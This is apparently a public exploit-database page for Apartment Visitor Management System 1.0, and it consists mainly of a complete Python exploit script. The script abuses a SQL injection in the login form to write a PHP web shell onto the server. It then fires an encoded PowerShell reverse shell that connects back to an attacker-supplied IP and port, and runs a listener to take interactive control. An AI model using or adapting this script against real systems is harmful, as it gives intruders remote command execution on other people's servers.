Apartment Visitor Management System (AVMS) 1.0 SQLi to RCE

2021.09.20
Credit: mari0x00
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Apartment Visitor Management System (AVMS) 1.0 - SQLi to RCE # Date: 2021-08-13 # Exploit Author: mari0x00 # Vendor Homepage: https://phpgurukul.com/apartment-visitors-management-system-using-php-and-mysql/ # Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=10395 # Version: 1.0 # Tested on: Windows 10 + XAMPP #!/usr/bin/python3 import requests, socket, threading import base64, time, sys print(('''###########################################################''',"red")) print(('''########### AVMS SQLi to RCE by mari0x00 ############''',"red")) print(('''###########################################################''',"red")) print("") URL = input("Provide URL for AVMS (e.g. 'http://localhost/avms/'): ") or 'http://localhost/avms/' path = input("Provide path for shell upload (default 'C:\\xampp\\htdocs\\avms\\lol.php'): ") or 'C:\\xampp\\htdocs\\avms\\lol.php' path = path.replace("\\", "\\\\") rhost = input("Provide attacker IP: ") or "127.0.0.1" rport = input("Provide attacker listening port: ") or "1337" # sending webshell payload = {"username": "admin' union select '<?php system(base64_decode($_GET[\"cmd\"]));?>' into outfile '" + path + "' -- 'a", "password": "test", "login": ''} requests.post(URL, data=payload) def shell(rhost, rport): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: s.bind((rhost, int(rport))) except socket.error as msg: print("Bind failed. Error Code : " + str(msg[0]) + " Message " + msg[1]) sys.exit() s.settimeout(5) s.listen(5) print('[+] Waiting for connection..') conn = False command='' while conn == False: try: conn, addr = s.accept() print("Got a connection from " + addr[0] + ":" + str(addr[1])) conn.send('\n'.encode()) time.sleep(1) print(conn.recv(0x10000).decode()) while(command != 'exit'): command=input('') conn.send((command + '\n').encode()) time.sleep(.3) res = conn.recv(0x10000) print(res.decode()) s.close() sys.exit("[!] Program exited") except socket.timeout: pass def start_shell(rhost, rport): revshell = "powershell -nop -NonI -W Hidden -Exec Bypass -c \"$client = New-Object System.Net.Sockets.TCPClient('" + rhost + "'," + rport + ");$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\"" revshell = revshell.encode('ascii') revshell = base64.b64encode(revshell) revshell = revshell.decode('ascii') connection = requests.get(URL+"/lol.php?cmd=" + revshell) print("[+] Starting to listen on port " + rport) time.sleep(0.5) threading.Thread(target=shell, args=(rhost, rport)).start() time.sleep(2) print("[+] Sending the reverse shell payload") threading.Thread(target=start_shell, args=(rhost, rport)).start()


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top